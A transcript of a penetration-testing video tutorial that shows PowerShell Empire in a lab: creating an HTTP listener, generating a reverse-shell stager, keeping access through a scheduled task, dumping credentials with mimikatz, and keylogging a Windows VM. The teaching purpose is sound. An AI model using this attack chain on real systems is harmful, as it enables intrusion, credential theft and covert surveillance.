In this video, we're going to look at how we can use PowerShell Empire to perform penetration tests and automate penetration testing tasks. PowerShell Empire, or just Empire, is a post-exploitation framework that's specifically designed for use in red team, blue team exercises, penetration testing, and adversary simulation. It works by giving you an interactive command and control environment, allowing you to do things like execute malicious payloads, pivot and move laterally within a network, and maintain persistence on a compromised system. Some of the key features of Empire include its agent-based communication, its ability to perform fileless execution using in-memory execution to avoid disk-based payloads and help evade antivirus solutions. It comes with a variety of built-in post-exploitation modules. It has cross-platform support. It can use multiple communication channels with flexible stagers, and it helps perform obfuscation and evasion tactics. In this demonstration, I'm going to be using a Kali Linux system as my command and control computer, and I'm going to be using a Windows VM as my target computer. To get started, on my Kali Linux system, I'm going to open up a terminal and use the command sudo PowerShell-Empire. This will give me a usage example telling me how I can use the PowerShell Empire tool, which comes pre-installed on Kali Linux. So we can see the usage is empire.py-h followed by a server client. And then these positional arguments are expanded upon, showing us that we can use server if we want to launch the Empire server, and client if we want to launch Empire CLI. In this case, on my Kali Linux machine, because I'm using it as the command and control center, I want to launch Empire server. So I'm going to use the command sudo PowerShell-Empire server. Once our server has started up, we can launch a new terminal and run sudo PowerShell-Empire client. Now we have an Empire console that we can work in. Let's start by setting up a listener. If I run the command listeners, we can then create a listener using the command useListener HTTP. This then shows us a table of all the configurations that are set up for that listener. We can see the host is correctly set up to our internal IP address, the name is HTTP, and so we can use the default settings here. If you needed to customize any of these values, you could use the command set followed by the name of the value you want to customize, and then the value you want to set it to. Since we're leaving the defaults, we can just use the command execute. So now our listener has successfully started, and our command and control center is ready to be connected back to. Now, let's generate a PowerShell stager to run on our target machine. To do that, I'm going to use the command useStager Windows_reverse shell. And we can see that for this one, we'll need to set a few different values. We'll have to set our listener to HTTP, and we'll have to set the local host to the IP address of our local machine, which is 192.168.56.102. And then we can generate that payload with the command generate. This will create a malicious executable that we could run on a target machine, which when run on a victim machine would connect back to our local host. So now I've switched over to the Windows VM, which is our target machine, and we can see I've put the launcher application that we generated onto the desktop. I'm going to double click to execute the application, which briefly opens a PowerShell window and then disappears. And then when I return to my Empire console, I will see a new agent has checked in. This means that our target computer has connected back to our command and control computer, and we're ready to start performing post-exploitation attacks. For our first automation task, we're going to set up a persistence module so that Empire will rerun anytime the machine is rebooted. This will allow us to maintain control of the computer even if it restarts. I'm first going to interact with the agent by using the command interact, followed by the agent ID. Now that I'm inside the agent session, I can start to use the modules for post-exploitation. And I'll do that using the command useModule PowerShell persistence userland sch tasks. I can see in the table I'll need to set a listener, and I'm going to set it to HTTP, and then execute this module. And we can see the scheduled task updater has successfully been created. This means the task will automatically execute Empire payloads whenever the user logs in. Now that we've established persistence, let's see if we can harvest any credentials from the machine. And to do that, we're going to use the command useModule PowerShell credentials mimikatz logon passwords. We can see there are no options that we need to set, so we can just go ahead and execute this module. And when the agent completes, we can see the results. And if we scroll down, we can find one particularly interesting user with the username of administrator, and we can find the SHA sum for that user's password. Now in this case, we weren't able to get it out in plain text, but this is still valuable information. Next, let's try to enable some keylogging. To do that, I'm going to use the command usemodule PowerShell collection keylogger, and then execute. If I then navigate to the directory indicated to me in the description of the module, I can see a keystrokes.txt file. If I open that, I can see administrator password 1 ! So it looks like the administrator on their machine has typed in their username and password, with the username being administrator and the password being password 1. So this is how we can use PowerShell Empire to perform and automate penetration testing tasks.